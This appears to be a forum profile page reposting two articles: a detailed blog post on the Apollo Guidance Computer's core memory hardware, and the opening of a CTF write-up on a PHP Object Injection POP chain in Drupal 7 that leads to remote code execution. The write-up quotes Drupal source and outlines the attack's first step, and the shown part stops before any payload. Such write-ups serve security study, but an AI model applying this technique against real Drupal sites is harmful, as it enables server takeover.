Everything posted by Nytro

  1. Inside the Apollo Guidance Computer's core memory

The Apollo Guidance Computer (AGC) provided guidance, navigation and control onboard the Apollo flights to the Moon. This historic computer was one of the first to use integrated circuits, containing just two types of ICs: a 3-input NOR gate for the logic circuitry and a sense amplifier IC for the memory. It also used numerous analog circuits built from discrete components using unusual cordwood construction.

[Image: The Apollo Guidance Computer. The empty space on the left held the core rope modules. The connectors on the right communicate between the AGC and the spacecraft.]

We[1] are restoring the AGC shown above. It is a compact metal box with a volume of 1 cubic foot that weighs about 70 pounds. The AGC had very little memory by modern standards: 2048 words of RAM in erasable core memory and 36,864 words of ROM in core rope memory. (In this blog post, I'll discuss just the erasable core memory.) The core rope ROM modules (which we don't have)[2] would be installed in the empty space on the left. On the right of the AGC, you can see the two connectors that connected the AGC to other parts of the spacecraft, including the DSKY (Display/Keyboard).[3]

By removing the bolts holding the two trays together, we could disassemble the AGC. Pulling the two halves apart takes a surprising amount of force because of the three connectors in the middle that join the two trays. The tray on the left is the "A" tray, which holds the logic and interface modules. The tangles of wire on the left of the tray are the switching power supplies that convert 28 volts from the spacecraft to 4 and 14 volts for use in the AGC. The tray on the right is the "B" tray, which holds the memory circuitry, oscillator and alarm. The core memory module was removed in this picture; it goes in the empty slot in the middle of the B tray.

[Image: The AGC is implemented with dozens of modules in two trays. The trays are connected through the three connectors in the middle.]
Core memory overview

Core memory was the dominant form of computer storage from the 1950s until it was replaced by semiconductor memory chips in the early 1970s. Core memory was built from tiny ferrite rings called cores, storing one bit in each core. Cores were arranged in a grid or plane, as in the highly-magnified picture below. Each plane stored one bit of a word, so a 16-bit computer would use a stack of 16 core planes. Each core typically had 4 wires passing through it: X and Y wires in a grid to select the core, a diagonal sense line through all the cores for reading, and a horizontal inhibit line for writing.[4]

[Image: Closeup of a core memory (not AGC). Photo by Jud McCranie (CC BY-SA 4.0).]

Each core stored a bit by being magnetized either clockwise or counterclockwise. A current in a wire through the core could magnetize the core, with the magnetization direction matching the current's direction. To read the value of a core, the core was flipped to the 0 state. If the core was previously in the 1 state, the changing magnetic field produced a voltage in the sense wire threaded through the cores. But if the core started in the 0 state, the sense line wouldn't pick up a voltage. Thus, forcing a core to 0 revealed the core's previous state (but erased it in the process).

A key property of the cores was hysteresis: a small current had no effect on a core; the current had to be above a threshold to flip the core. This was very important because it allowed a grid of X and Y lines to select one core from the grid. By energizing one X line and one Y line, each with half the necessary current, only the core where both lines crossed would get enough current to flip, and the other cores would be unaffected. This "coincident-current" technique made core memory practical, since a few X and Y drivers could control a large core plane.

The AGC's erasable core memory system

The AGC used multiple modules in the B tray to implement core memory.
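The coincident-current selection and destructive read described in the core memory overview can be modeled in a few lines of Python. This is a minimal sketch under idealized assumptions that are not from the article: currents are in arbitrary units, each energized select line carries exactly half the switching current (0.5), and a core flips only when the net current through it reaches 1.0. The class and method names are hypothetical.

```python
HALF = 0.5       # current on one energized select line (assumed units)
THRESHOLD = 1.0  # net current needed to flip a core (assumed units)


class CorePlane:
    """Idealized core plane; each core is +1 (holds a 1) or -1 (holds a 0)."""

    def __init__(self, rows, cols):
        self.state = [[-1] * cols for _ in range(rows)]

    def pulse(self, x, y, direction):
        """Energize row x and column y with half current in `direction`
        (+1 drives toward 1, -1 drives toward 0). Returns the cores that
        flipped; a flip is what induces a voltage on the sense line."""
        flipped = []
        for r, row in enumerate(self.state):
            for c, old in enumerate(row):
                # 0, 1 or 2 energized lines pass through this core
                current = HALF * ((r == x) + (c == y))
                if current >= THRESHOLD and old != direction:
                    row[c] = direction
                    flipped.append((r, c))
        return flipped

    def read(self, x, y):
        """Destructive read: force the core to 0 and report whether it flipped."""
        return 1 if self.pulse(x, y, -1) else 0

    def write_one(self, x, y):
        """Store a 1 by driving the selected core in the opposite direction."""
        self.pulse(x, y, +1)


plane = CorePlane(64, 32)   # AGC mat geometry: 64 X lines by 32 Y lines
plane.write_one(10, 5)
print(plane.read(10, 5))    # 1
print(plane.read(10, 5))    # 0: the first read erased the bit
```

A half-selected core sees only 0.5 units and never flips, which is why one X driver and one Y driver are enough to address a single core. The second read returning 0 shows why every read must be followed by a write.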
The Erasable Memory module (B12) contained the actual cores: 32,768 cores to support 2048 words, where each word was 15 bits plus a parity bit. Several more modules contained the supporting circuitry for the memory.[5] The remainder of this article will describe these modules.

[Image: The erasable memory module in the Apollo Guidance Computer, with the supporting modules next to it. Image courtesy of Mike Stewart.]

The photo below shows the Erasable Memory module after removing it from the tray. Unlike the other modules, this module has a black metal cover. Internally, the cores are encapsulated in Silastic (silicone rubber), which is then encapsulated in epoxy. This was intended to protect the delicate cores inside, but it took NASA a couple of tries to get the encapsulation right. Early modules (including ours) were susceptible to wire breakages from vibrations. At the bottom of the module are the gold-plated pins that plug into the backplane.

[Image: The erasable core memory module from the Apollo Guidance Computer.]

Core memory used planes of cores, one plane for each bit in the word. The AGC had 16 planes (which were called mats), each holding 2048 bits in a 64×32 grid. Note that each mat consists of eight 16×16 squares. The diagram below shows the wiring of the single sense line through a mat. The X/Y lines were wired horizontally and vertically. The inhibit line passed through all the cores in the mat; unlike the diagonal sense line, it ran vertically.

[Image: The sense line wiring in an AGC core plane (mat). The 2048 cores are in a 64×32 grid.]

Most computers physically stacked the core planes on top of each other, but the AGC used a different mechanical structure, folding the mats (planes) to fit compactly in the module. The mats were accordion-folded to fit tightly into the module as shown in the diagram below. (Each of the 16 mats is outlined in cyan.) When folded, the mats formed a block (oriented vertically in the diagram below) that was mounted horizontally in the core module.
[Image: This folding diagram shows how 16 mats are folded into the core module. (Each cyan rectangle indicates a mat.)]

The photo below shows the memory module with the cover removed. (This is a module on display at the CHM, not our module.) Most of the module is potted with epoxy, so the cores are not visible. The most noticeable feature is the L-shaped wires on top. These connect the X and Y pins to 192 diodes. (The purpose of the diodes will be explained later.) The diodes are hidden underneath this wiring in two layers, mounted horizontally cordwood-style. The leads from the diodes are visible as they emerge and connect to terminals on top of the black epoxy.

[Image: The AGC's memory module with the cover removed. This module is on display at the CHM. Photo courtesy of Mike Stewart.]

Marc took X-rays of the module and I stitched the photos together (below) to form an image looking down into the module. The four rows of core mats in the folding diagram correspond to the four dark blocks. You can also see the two rows of diodes as two darker horizontal stripes. At this resolution, the wires through the cores and the tangled mess of wires to the pins are not visible; these are very thin 38-gauge wires, much thinner than the wires to the diodes.

[Image: Composite X-ray image of the core memory module. The stitching isn't perfect in the image because the parallax and perspective changed in each image. In particular, the pins appear skewed in different directions.]

The diagram below shows a cross-section of the memory module. (The front of the module above corresponds to the right side of the diagram.) The diagram shows how the two layers of diodes (blue) are arranged at the top and are wired (red) to the core stack (green) through the "feed thru". Also note how the pins (yellow) at the bottom of the module rise up through the epoxy and are connected by wires (red) to the core stack.

[Image: Cross-section of memory module showing internal wiring.]
(Diagram from the Apollo Computer Design Review, page 9-39; original Block II design.)

Addressing a memory location

The AGC's core memory holds 2048 words in a 64×32 matrix. To select a word, one of the 64 X select lines is energized along with one of the 32 Y select lines. One of the challenges of a core memory system is driving the X and Y select lines. These lines need to be driven at high current (hundreds of milliamps). In addition, the read and write currents are in opposite directions, so the lines need bidirectional drivers. Finally, the number of X and Y lines is fairly large (64 + 32 for the AGC), so using a complex driver circuit on each line would be too bulky and expensive. In this section, I'll describe the circuitry in the AGC that energizes the right select lines for a particular address.

The AGC uses a clever trick to minimize the hardware required to drive the X and Y select lines. Instead of using 64 X line drivers, the AGC has 8 X drivers at the top of the matrix and 8 at the bottom of the matrix. Each of the 64 select lines is connected to a different top and bottom driver pair. Thus, energizing a top driver and a bottom driver produces current through a single X select line, so only 8+8 X drivers are required rather than 64.[6] The Y drivers are similar, using 4 on one side and 8 on the other. The downside of this approach is that 192 diodes are required to prevent "sneak paths" through multiple select lines.[7]

[Image: Illustration of how "top" and "bottom" drivers work together to select a single line through the core matrix. Original diagram here.]

The diagram above demonstrates this technique for the vertical lines in a hypothetical 9×5 core array. There are three "top" drivers (A, B and C) and three "bottom" drivers (1, 2 and 3). If driver B is energized positive and driver 1 is energized negative, current flows through the core line highlighted in red.
Reversing the polarity of the drivers reverses the current flow, and energizing different drivers selects a different line. To see the need for diodes, note that in the diagram above, current could flow from B to 2, up to A and finally down to 1, for instance, incorrectly energizing multiple lines.

The address decoder logic is in tray "A" of the AGC, implemented in several logic modules.[9] The AGC's logic is built entirely from 3-input NOR gates (two per integrated circuit), and the address decoder is no exception. The image below shows logic module A14. (The other logic modules look essentially the same, but the internal printed circuit board is wired differently.) The logic modules all have a similar design: two rows of 30 ICs on each side, for 120 ICs in total, or 240 3-input NOR gates. (Module A14 has one blank location on each side, for 118 ICs in total.) The logic module plugs into the AGC via the four rows of pins at the bottom.[10]

[Image: Much of the address decoding is implemented in logic module A14. Photo courtesy of Mike Stewart.]

The diagram below shows the circuit to generate one of the select signals (XB6, X bottom 6).[11] The NOR gate outputs a 1 when the three lowest address bits are 110 (i.e. 6). The other select signals are generated with similar circuits, using different address bits as inputs.

[Image: This address decode circuit generates one of the select signals. The AGC has 28 decode circuits similar to this.]

Each integrated circuit implemented two NOR gates using RTL (resistor-transistor logic), an early logic family. These ICs were costly: they cost $20-$30 each (around $150 in current dollars). There wasn't much inside each IC, just six transistors and eight resistors. Even so, the ICs provided a density improvement over the planned core-transistor logic, making the AGC possible. The decision to use ICs in the AGC was made in 1962, amazingly just four years after the IC was invented.
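The address-to-driver mapping can be sketched in Python using the bit assignment given in the footnotes (S01-S03 for X bottom, S04-S06 for X top, S07-S08 for Y bottom, and EAD09-EAD11 for Y top). This is an illustrative model, not the AGC's actual gate netlist, and the function names are hypothetical. Two assumptions are worth flagging: bits 9-11 of an 11-bit erasable address stand in for EAD09-EAD11 (ignoring the bank-select logic that really produces them), and, because a NOR gate outputs 1 only when all of its inputs are 0, each decoder is assumed to receive the complement of every address bit that must be 1 and the true form of every bit that must be 0. The four buffer gates per output are left out.

```python
def nor(*inputs):
    """NOR gate (the AGC's ICs were 3-input NORs): 1 only if every input is 0."""
    return int(not any(inputs))


def bit(addr, n):
    """Address bit Sn, numbered from 1 as in the AGC documentation."""
    return (addr >> (n - 1)) & 1


def decoder(addr, first_bit, width, pattern):
    """One decode circuit: a single NOR gate that outputs 1 only when the
    `width` address bits starting at `first_bit` equal `pattern`.
    Assumption: bits that must be 1 are fed in complemented and bits that
    must be 0 are fed in directly, so every input is 0 exactly on a match."""
    inputs = []
    for i in range(width):
        wanted = (pattern >> i) & 1
        actual = bit(addr, first_bit + i)
        inputs.append(1 - actual if wanted else actual)
    return nor(*inputs)


# Driver groups: name -> (first address bit, number of bits)
GROUPS = {
    "XB": (1, 3),  # 8 X bottom drivers from S01-S03
    "XT": (4, 3),  # 8 X top drivers from S04-S06
    "YB": (7, 2),  # 4 Y bottom drivers from S07-S08
    "YT": (9, 3),  # 8 Y top drivers (stand-in for EAD09-EAD11)
}


def active_drivers(addr):
    """Evaluate every decode circuit and return the one driver that fires
    in each group."""
    active = {}
    for name, (first_bit, width) in GROUPS.items():
        hits = [p for p in range(2 ** width) if decoder(addr, first_bit, width, p)]
        assert len(hits) == 1, "exactly one decoder per group should fire"
        active[name] = hits[0]
    return active


decoder_count = sum(2 ** width for _, width in GROUPS.values())
print(decoder_count)         # 28
print(active_drivers(6))     # {'XB': 6, 'XT': 0, 'YB': 0, 'YT': 0}
```

With 8 × 8 top/bottom pairs for X and 4 × 8 for Y, the four indices pick exactly one of the 64 X lines and one of the 32 Y lines; how the pairs are assigned to physical lines is not described in the article and is not modeled here.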
The AGC was the largest consumer of ICs from 1962 to 1965 and ended up being a major driver of the integrated circuit industry.

[Image: Each IC contains two NOR gates implemented with resistor-transistor logic. From Schematic 2005011.]

The die photo below shows the internal structure of the NOR gate chip; the metal layer of the silicon chip is most visible.[12] The top half is one NOR gate and the bottom half is the other. The metal wires connect the die to the 10-pin package. The transistors are clumped together in the middle of the chip, surrounded by the resistors.

[Image: Die photo of the dual 3-input NOR gate used in the AGC. Pins are numbered counterclockwise; pin 3 is to the right of the "P". Photo by Lisa Young, Smithsonian.]

Erasable Driver Modules

Next, the Erasable Driver module converts the 4-volt logic-level signals from the address decoder into 14-volt pulses with controlled current. The AGC has two identical Erasable Driver modules, in slots B9 and B10.[5] Two modules are required due to the large number of signals: 28 select lines (X and Y, top and bottom), 16 inhibit lines (one for each bit), and a dozen control signals. The select line driver circuits are simple transistor switching circuits: a transistor and two resistors. Other circuits, such as the inhibit line drivers, are a bit more complex because the shape and current of the pulse need to be carefully matched to the core module. This circuit uses three transistors, an inductor, and a handful of resistors and diodes. The resistor values are carefully selected during manufacturing to provide the desired current.

[Image: The erasable driver module, front and back. Photo courtesy of Mike Stewart.]

This module, like the other non-logic modules, is built using cordwood construction. In this high-density construction, components were inserted into holes in the module, passing through from one side of the module to the other, with their leads exiting on either side. (The exception is transistors, which have all three leads on the same side.)
On each side of the module, point-to-point wiring connected the components with welded connections. In the photo below, note the transistors (golden, labeled with Q), resistors (R), diodes (CR for crystal rectifier, with K indicating the cathode), large capacitors (C), inductor (L), and feed-throughs (FT). A plastic sheet over the components conveniently labels them; for instance, "7Q1" means transistor Q1 for circuit 7 (of a repeated circuit). These labels match the designations on the schematic. At the bottom are connections to the module pins. Modules that were flown on spacecraft were potted with epoxy so the components were protected against vibration. Fortunately, our AGC was used on the ground and left mostly unpotted, so the components are visible.

[Image: A closeup of the Erasable Driver module, showing the cordwood construction. Photo courtesy of Mike Stewart.]

Current Switch Module

You might expect that the 14-volt pulses from the Erasable Driver modules would drive the X and Y lines in the core. However, the signals go through one more module, the Current Switch module, in slot B11 just above the core memory module. This module generates the bidirectional pulses necessary for the X and Y lines. The driver circuits are very interesting, as each driver includes a switching core in the circuit. (These cores are much larger than the cores in the memory itself.)[13] The driver uses two transistors: one for the read current, and the other for the write current in the opposite direction. The switching core acts somewhat like an isolation transformer, providing the drive signal to the transistors. But the switching core also "remembers" which line is being used. During the read phase, the address decoder flips one of the cores. This generates a pulse that drives the read transistor. During the write phase, the address decoder is not involved. Instead, a "reset" signal is sent through all the driver cores.
Only the core that was flipped in the previous phase will flip back, generating a pulse that drives the other transistor. Thus, the driver core provides memory of which line is active, avoiding the need for a flip flop or other latch.

[Image: The current switch module. (This is from the CHM, as ours is encapsulated and there's nothing to see but black epoxy.) Photo courtesy of Mike Stewart.]

The diagram below shows the schematic of one of the current switches. The heart of the circuit is the switching core. If the driver input is 1, winding A will flip the core when the set strobe is pulsed. This will produce pulses on the other windings; the positive pulse on winding B will turn on transistor Q55, pulling the output X line low for reading.[14] The output is connected via eight diodes to eight X top lines through the core. A similar bottom select switch (without diodes) will pull X bottom lines high; the single X line with the top low and the bottom high will be energized, selecting that row. For a write, the reset line is pulled low, energizing winding D. If the core had flipped earlier, it will flip back, generating a pulse on winding C that will turn on transistor Q56 and pull the output high. But if the core had not flipped earlier, nothing happens and the output remains inactive. As before, one X line and one Y line through the core planes will be selected, but this time the current is in the opposite direction for a write.

[Image: Schematic of one of the current switches in the AGC. This switch is the driver for X top line 0. The schematic shows one of the 8 pairs of diodes connected to this driver.]

The photo below shows one of the current switch circuits and its cordwood construction. The switching core is the 8-pin black module between the transistors. The core and the wires wound through it are encapsulated with epoxy, so there's not much to see. At the bottom of the photo, you can see the Malco Mini-Wasp pins that connect the module to the backplane.
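The way the switching core "remembers" the selected line can be captured as a tiny state machine. This Python sketch models only the logic described above (set strobe, reset pulse, and which transistor receives a pulse), treating each switching core as a two-state latch. The class name and the XT0-XT7 labels are hypothetical, and none of the analog behavior (winding polarities, currents, diodes) is modeled.

```python
class CurrentSwitch:
    """Logic-level model of one current switch and its switching core."""

    def __init__(self, name):
        self.name = name
        self.flipped = False  # magnetic state of the switching core

    def set_strobe(self, driver_input):
        """Read phase: winding A flips the core only if the decoder selected
        this switch. The flip induces the pulse that turns on the read
        transistor. Returns True if the read transistor was pulsed."""
        if driver_input and not self.flipped:
            self.flipped = True
            return True
        return False

    def reset(self):
        """Write phase: every switch receives the reset pulse, but only a core
        that flipped during the read phase flips back, pulsing the write
        transistor. Returns True if the write transistor was pulsed."""
        if self.flipped:
            self.flipped = False
            return True
        return False


def memory_cycle(switches, selected):
    """One read/write cycle; only switch `selected` gets a decoder input of 1."""
    read_pulsed = []
    for i, switch in enumerate(switches):
        if switch.set_strobe(i == selected):
            read_pulsed.append(switch.name)
    # The decoder plays no part in the write phase.
    write_pulsed = []
    for switch in switches:
        if switch.reset():
            write_pulsed.append(switch.name)
    return read_pulsed, write_pulsed


x_top = [CurrentSwitch(f"XT{i}") for i in range(8)]
print(memory_cycle(x_top, 3))  # (['XT3'], ['XT3'])
```

The write phase needs no copy of the address: the only state carried from read to write is the magnetization of one switching core, which is how the circuit avoids a flip flop.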
[Image: Closeup of one switch circuit in the Current Switch Module. The switching core (center) has transistors on either side.]

Sense Amplifier Modules

When a core flips, the changing magnetic field induces a weak signal in the corresponding sense line. There are 16 sense lines, one for each bit in the word. The 16 sense amplifiers receive these signals, amplify them, and convert them to logic levels. The sense amplifiers are implemented using a special sense amplifier IC. (The AGC used only two different ICs, the sense amplifier and the NOR gate.) The AGC has two identical sense amplifier modules, in slots B13 and B14; module B13 is used by the erasable core memory, while B14 is used by the fixed memory (i.e. core rope used for ROM). The signal from the core first goes through an isolation transformer. It is then amplified by the IC, and the output is gated by a strobe transistor. The sense amplifier depends on carefully-controlled voltage levels for bias and thresholds. These voltages are produced by voltage regulators on the sense amplifier modules that use Zener diodes for regulation. The voltage levels are tuned during manufacturing by selecting resistor values and optional diodes, matching each sense amplifier module to the characteristics of the computer's core memory module.

The photo below shows one of the sense amp modules. The eight repeated units are eight sense amplifiers; the eight other sense amplifiers are on the other side of the module. The reddish circles are the pulse transformers, while the lower circles are the sense amplifier ICs. The voltage regulation is in the middle and right of the module. On top of the module (front in the photo) you can see the horizontal lines of the nickel ribbon that connects the circuits; it is somewhat similar to a printed circuit board.

[Image: Sense amplifier module with top removed. Note the nickel ribbon interconnect at the top of the module.]

The photo below shows a closeup of the module.
At the top are two amplifier integrated circuits in metal cans. Below are two reddish pulse transformers. An output driver transistor is between the pulse transformers.[15] The resistors and capacitors are mounted using cordwood construction, so one end of each component is wired on this side of the module, and the other end on the other side. Note the row of connections at the top of the module; these connect to the nickel ribbon interconnect.

[Image: Closeup of the sense amplifier module for the AGC. The sense amplifier integrated circuits are at the top and the reddish pulse transformers are below. The pins are at the bottom and the wires at the top go to the nickel ribbon, which is like a printed circuit board.]

The diagram below shows the circuitry inside each sense amp integrated circuit. The sense amp chip is considerably more complex than the NOR gate IC. The chip receives the sense signal from the pulse transformer, and the differential amplifier amplifies it.[16] If the signal exceeds a threshold, the IC outputs a 1 bit when clocked by the strobe.

[Image: Circuitry inside the sense amp integrated circuit for the AGC.]

Writes

With core memory, the read operation and write operation are always done in pairs. Since a word is erased when it is read, it must then be written, either with the original value or a new value. In the write cycle, the X and Y select lines are energized to flip the core to 1, using the opposite current from the read cycle. Since the same X and Y select lines go through all the planes, all bits in the word would be set to 1. To store a 0 bit, each plane has an inhibit line that goes through all the cores in the plane. Energizing the inhibit line in the opposite direction to the X and Y select lines partially cancels out the current and prevents the core from receiving enough current to flip it, so the bit remains 0. Thus, by energizing the appropriate inhibit lines, any value can be written to the word in core.
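The read-then-write cycle and the role of the inhibit lines can be sketched at the level of one 16-bit word, with one core per mat. The currents are idealized assumptions rather than AGC values: each select line carries half the switching current, the inhibit line carries half in the opposite direction, and a core flips at a net current of 1.0. The function names are hypothetical.

```python
HALF = 0.5       # half-select current (assumed units)
THRESHOLD = 1.0  # net current that flips a core (assumed units)
BITS = 16        # one core per mat: 15 data bits plus parity


def read_word(cores):
    """Destructive read: drive every core of the word toward 0. Cores that
    held a 1 flip and produce a sense pulse; all cores end up at 0."""
    value = 0
    for plane, state in enumerate(cores):
        if state == 1:          # flip -> pulse on this mat's sense line
            value |= 1 << plane
        cores[plane] = 0
    return value


def write_word(cores, value):
    """Write cycle, assuming the word's cores are all 0 (as after a read).
    The X and Y currents reach every mat, so each core would flip to 1
    unless that mat's inhibit line cancels part of the current."""
    for plane in range(BITS):
        current = HALF + HALF             # X select + Y select
        if not (value >> plane) & 1:
            current -= HALF               # inhibit: keep this bit at 0
        if current >= THRESHOLD:
            cores[plane] = 1


def memory_cycle(cores, new_value=None):
    """Read a word, then write back either the old value or a new one."""
    old = read_word(cores)
    write_word(cores, old if new_value is None else new_value)
    return old


word = [0] * BITS
write_word(word, 0o12345)
print(oct(memory_cycle(word)))         # 0o12345 (and the value is restored)
print(oct(memory_cycle(word, 0o777)))  # 0o12345, now replaced by 0o777
print(oct(read_word(word)))            # 0o777
```

Only planes whose inhibit line is energized end up at half current, so one pair of X/Y pulses plus 16 per-bit inhibit decisions is enough to store any 16-bit value.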
The 16 inhibit lines are driven by the Erasable Driver modules.

The broken wire

During the restoration, we tested the continuity of all the lines through the core module. Unfortunately, we discovered that the inhibit line for bit 16 is broken internally. NASA discovered in early testing that wires could be sheared inside the module due to vibrations between the silicone encapsulation and the epoxy encapsulation. They fixed this problem in the later modules that were flown, but our module had the original faulty design. We attempted to find the location of the broken wire with X-rays, but couldn't spot the break. Time-domain reflectometry suggests the break is inconveniently located in the middle of the core planes. We are currently investigating options to deal with this. Marc has a series of AGC videos; the video below provides detail on the broken wire in the memory module.

Conclusion

Core memory was the best storage technology in the 1960s, and the Apollo Guidance Computer used it to get to the Moon. In addition to the core memory module itself, the AGC required several modules of supporting circuitry. The AGC's logic circuits used early NOR-gate integrated circuits, while the analog circuits were built from discrete components and sense amplifier ICs using cordwood construction.

The erasable core memory in the AGC stored just 2K words. Because each bit in core memory required a separate physical ferrite core, density was limited. Once semiconductor memory became practical in the 1970s, it rapidly replaced core memory. The image below shows the amazing density difference between semiconductor memory and core memory: 64 bits of core take about the same space as 64 gigabytes of flash.

[Image: Core memory from the IBM 1401 compared with modern flash memory.]

I announce my latest blog posts on Twitter, so follow me @kenshirriff for future articles. I also have an RSS feed. See the footnotes for Apollo manuals[17] and more information sources[18].
Thanks to Mike Stewart for supplying images and extensive information.

Notes and references

[1] The AGC restoration team consists of Mike Stewart (creator of FPGA AGC), Carl Claunch, Marc Verdiell (CuriousMarc on YouTube) and myself. The AGC that we're restoring belongs to a private owner who picked it up at a scrap yard in the 1970s after NASA scrapped it. For simplicity I refer to the AGC we're restoring as "our AGC". The Apollo flights had one AGC in the command module (the capsule that returned to Earth) and one AGC in the lunar module. In 1968, before the Moon missions, NASA tested a lunar module (with astronauts aboard) in a giant vacuum chamber in Houston to ensure that everything worked in space-like conditions. We believe our AGC was installed in that lunar module (LTA-8). Since this AGC was never flown, most of the modules are not potted with epoxy.

[2] We don't have core rope modules, but we have a core rope simulator from the 1970s. Yes, we know about Francois; those are ropes for the earlier Block I Apollo Guidance Computer and are not compatible with our Block II AGC.

[3] Many people have asked if we talked to Fran about the DSKY. Yes, we have.

[4] There were alternative ways to wire a core plane. Using a diagonal sense wire reduced the noise in the sense wire from X and Y pulses, but some systems used a horizontal sense wire. Some core systems used the same wire for sense and inhibit (which simplified manufacturing), but that made noise rejection more complex.

[5] If you look carefully at the pictures of modules installed in the AGC, the Erasable Driver module in B10 is upside down. This is not a mistake, but how the system was designed. I assume this simplified the backplane wiring somehow, but it looks very strange.

[6] The IBM 1401 business computer, for example, used a different approach to generate the X and Y select lines. To generate the 50 X select signals, it used a 5×10 matrix of cores (separate from the actual memory cores).
Two signals into the matrix were energized at the same time, flipping one of the 50 cores and generating a pulse on that line. Thus, only 5+10 drivers were needed instead of 50. The Y select signals were similar, using an 8×10 matrix. Details here.

[7] The AGC core memory required 192 diodes to prevent sneak paths, where a pulse could go backward through the wrong select lines. Each line required two diodes since the lines are driven in one direction for read and in the opposite direction for write. Since there are 64 X lines and 32 Y lines, 2×(64+32) = 192 diodes were required. These diodes were installed in two layers in the top of the core memory module.

[8] The memory address is mapped onto the select lines as follows. The eight X bottom signals are generated from the lowest address bits, S01, S02 and S03. (Bits in a word are numbered starting at 1, not 0.) Each decoder output has a NOR gate to select a particular bit pattern, along with four more NOR gates as buffers. The eight X top signals are generated from address bits S04, S05, and S06. The four Y bottom signals are generated from address bits S07 and S08. The eight Y top signals are generated from address bits EAD09, EAD10, and EAD11; these in turn were generated from S09 and S10 along with bank select bits EB9, EB10 and EB11. (The AGC used 12-bit addresses, allowing 4096 words to be addressed directly. Since the AGC had 38K of memory in total, it had a complex memory bank system to access the larger memory space.)

[9] For address decoding, the X drivers were in module A14, the Y top drivers were in A7 and the Y bottom drivers in A14. The memory address was held in the memory address register (S register) in module A12, which also held a bit of decoding logic. Module A14 also held some memory timing logic. In general, the AGC's logic circuits weren't cleanly partitioned across modules, since making everything fit was more important than a nice design.
[10] One unusual thing to notice about the AGC's logic circuitry is that there are no bypass capacitors. Most integrated circuit logic has a bypass capacitor next to each IC to reduce noise, but NASA found that the AGC worked better without bypass capacitors.

[11] The "Blue-nose" gate doesn't have the pull-up resistor connected, making it open collector. It is presumably named after its blue appearance on blueprints. Blue-nose outputs can be connected together to form a NOR gate with more inputs. In the case of the address decoder, the internal pull-up resistor is not used, so the Erasable Driver module (B9/B10) can pull the signal up to BPLUS (+14V) rather than the +4V logic level.

[12] The AGC project used integrated circuits from multiple suppliers, so die photos from different sources show different layouts.

[13] The memory cores and the switching cores were physically very different. The cores in the memory module had a radius between 0.047 and 0.051 inches (about 1.2mm). The switching cores were much larger (either .249" or .187" depending on the part number) and had 20 to 50 turns of wire through them.

[14] For some reason, the inputs to the current switches are numbered starting at 0 (XT0E-XT7E) while the outputs are numbered starting at 1 (1AXBF-8AXBF). Just in case you try to understand the schematics.

[15] The output from the sense amplifiers is a bit confusing because the erasable core memory (RAM) and fixed rope core memory (ROM) outputs are wired together. The RAM has one sense amp module with 16 amplifiers in slot B13, and the ROM has its own identical sense amp module in slot B14. However, each module only has 8 output transistors. The two modules are wired together so 8 output bits are driven by transistors in the RAM's sense amp module and 8 output bits are driven by transistors in the ROM's sense amp module. (The motivation behind this is to use identical sense amp modules for RAM and ROM, but only needing 16 output transistors in total.
Thus, the transistors are split up 8 to a module.)

[16] I'll give a bit more detail on the sense amps here. The key challenge with the sense amps is that the signal from a flipping core is small and there are multiple sources of noise that the sense line can pick up. By using a differential signal (i.e. looking at the difference between the two inputs), noise that is picked up by both ends of the sense line (common-mode noise) can be rejected. The differential transformer improved the common-mode noise rejection by a factor of 30. (See page 9-16 of the Design Review.) The other factor is that the sense line goes through some cores in the same direction as the select lines, and through some cores in the opposite direction. This helps cancel out noise from the select lines. However, the consequence is that the pulse on the sense line may be either positive or negative. Thus, the sense amp needed to handle pulses of either polarity; the threshold stage converted the bipolar signal to a binary output.

[17] The Apollo manuals provide detailed information on the memory system. The manual has a block diagram of the AGC's memory system. The address decoder is discussed in the manual starting at 4-416 and schematics are here. Schematics of the Erasable Driver modules are here and here; the circuit is discussed in section 4-5.8.3.3 of the manual. Schematics of the Current Switch module are here and here; the circuit is discussed in section 4-5.8.3.3 of the manual. Sense amplifiers are discussed in section 4-5.8.3.4 of the manual with schematics here and here; schematics are here and here.

[18] For more information on the AGC, the Virtual AGC site has tons of information on the AGC; in particular, the ElectroMechanical page has lots of schematics and drawings. There's a video of Eldon Hall, designer of the AGC, disassembling our AGC in 2004. If you want to try a simulated AGC in your browser, see moonjs.
Eldon Hall's book Journey to the Moon: The History of the Apollo Guidance Computer is very interesting. Also see Sunburst and Luminary: An Apollo Memoir by Don Eyles, who wrote a lot of the lunar landing code and discusses the famous program alarms. The Apollo Guidance Computer: Architecture and Operation is unevenly written and has errors, but its discussion of space navigation and a lunar mission in the last half of the book is informative.

Source: http://www.righto.com/2019/01/inside-apollo-guidance-computers-core.html
  2. CTF Writeup: Complex Drupal POP Chain

29 Jan 2019 by Simon Scannell

A recent Capture-The-Flag tournament hosted by Insomni’hack challenged participants to craft an attack payload for Drupal 7. This blog post will demonstrate our solution for a PHP Object Injection with a complex POP gadget chain.

About the Challenge

The Droops challenge consisted of a website running a modified version of Drupal 7.63. The creators of the challenge added a cookie to the Drupal installation that contained a PHP serialized string, which was then unserialized on the remote server, leading to a PHP Object Injection vulnerability. Finding the cookie was straightforward and the challenge was obvious: finding and crafting a POP chain for Drupal. If you are not familiar with PHP Object Injection, we recommend reading our blog post about the basics of PHP Object Injection.

Drupal POP Chain to Drupalgeddon 2

We found the following POP chain in the Drupal source code. It affects Drupal's cache mechanism. Through this chain it was possible to inject into the Drupal cache and abuse the same feature that led to the Drupalgeddon 2 vulnerability. No knowledge of that vulnerability is required to read this blog post, as each relevant step will be explained.

The POP chain is a second-order Remote Code Execution, which means that it consists of two steps:
- Injecting into the database cache that the rendering engine uses
- Exploiting the rendering engine and Drupalgeddon 2

Injecting into the cache

The DrupalCacheArray class in includes/bootstrap.inc implements a destructor that writes some data to the database cache with the method set(). This is the entry point of our gadget chain.

```php
/**
 * Destructs the DrupalCacheArray object.
 */
public function __destruct() {
  $data = array();
  foreach ($this->keysToPersist as $offset => $persist) {
    if ($persist) {
      $data[$offset] = $this->storage[$offset];
    }
  }
  if (!empty($data)) {
    $this->set($data);
  }
}
```

The set() method essentially calls Drupal’s cache_set() function with $this->cid, $data, and $this->bin. All three are under the attacker's control because they are properties of the injected object. We therefore assumed that we could inject arbitrary data into the Drupal cache.

```php
protected function set($data, $lock = TRUE) {
  // Lock cache writes to help avoid stampedes.
  // To implement locking for cache misses, override __construct().
  $lock_name = $this->cid . ':' . $this->bin;
  if (!$lock || lock_acquire($lock_name)) {
    if ($cached = cache_get($this->cid, $this->bin)) {
      $data = $cached->data + $data;
    }
    cache_set($this->cid, $data, $this->bin);
    if ($lock) {
      lock_release($lock_name);
    }
  }
}
```

